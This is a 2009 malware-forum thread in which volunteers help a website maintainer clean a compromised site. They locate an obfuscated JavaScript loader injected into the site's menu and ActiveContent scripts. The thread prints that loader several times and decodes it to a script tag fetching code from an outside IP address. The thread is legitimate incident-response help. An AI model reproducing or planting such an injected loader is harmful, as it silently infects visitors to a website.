Malware Domain List

Malware Related => Compromised Servers => Topic started by: gabbafam on April 16, 2009, 12:32:59 pm

Title: haakwine.com compromised
Post by: gabbafam on April 16, 2009, 12:32:59 pm

Hi, I am a novice user that is having the malicious site 94.247.2.195 blocked every time i access one website www.haakwine.com.  I did a yahoo search on the 94.247.2.195 and found this malware domain list and forum.  I don't know if you are the right person to post a reply to but I am really wanting to find out how to clean this off this website because i am the website updater and don't know why it is doing this.  Can you offer any help whatsoever?  I would be greatly indebted to you.

Quote from: MysteryFCM on April 07, 2009, 06:17:04 am

I think you could be right :( ..... the following is the uncompressed output from the PDF;

/edit

MysteryFCM: Disabled link and removed code from quoted post. Split and moved to compromised servers forum

Title: Compromised
Post by: MysteryFCM on April 16, 2009, 12:39:32 pm

I've checked the site you referenced and cannot find anything suspicious. Is this the site you are having difficulty with?

/edit

Nevermind, found it. The code is at the bottom of mm_menu.js (disable this file or replace it with a clean copy);

Code: [Select]

document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
This decodes to;

Code: [Select]

<script src=//94.247.2.195/jquery.js></script>

Title: Compromised
Post by: GmG on April 16, 2009, 12:43:36 pm

There's malware script on mm_menu.js

Code: [Select]

<!--
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
 -->


Title: Compromised
Post by: MysteryFCM on April 16, 2009, 12:45:27 pm

heh yep, updated my post whilst you were posting ....

Title: Compromised
Post by: MysteryFCM on April 16, 2009, 12:47:25 pm

Script is also present in;

http://www.haakwine.com/Scripts/AC_RunActiveContent.js

Title: Re: haakwine.com compromised
Post by: SysAdMini on April 16, 2009, 01:11:28 pm

it is also present in the last line of

Code: [Select]

www.haakwine.com/mm_menu.jshttp://wepawet.cs.ucsb.edu/view.php?hash=fc23e5732b039b053d6bd7a04a30fdec&t=1239885919&type=js

Title: Re: haakwine.com compromised
Post by: gabbafam on April 16, 2009, 03:03:39 pm

I wished I knew all you all know on this forum.  I am sure this is a stupid question for you but "how do you disable a file?"  Thank you so much.

Title: Re: haakwine.com compromised
Post by: RS-232 on April 16, 2009, 03:13:31 pm

By "disable",it simply means removing the code posted above from the html/php files where it is present...

Quote

document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));

Title: Re: haakwine.com compromised
Post by: RS-232 on April 16, 2009, 11:11:18 pm

Speaking of it...
http://blog.scansafe.com/journal/2009/4/14/malware-manipulating-google-serps.html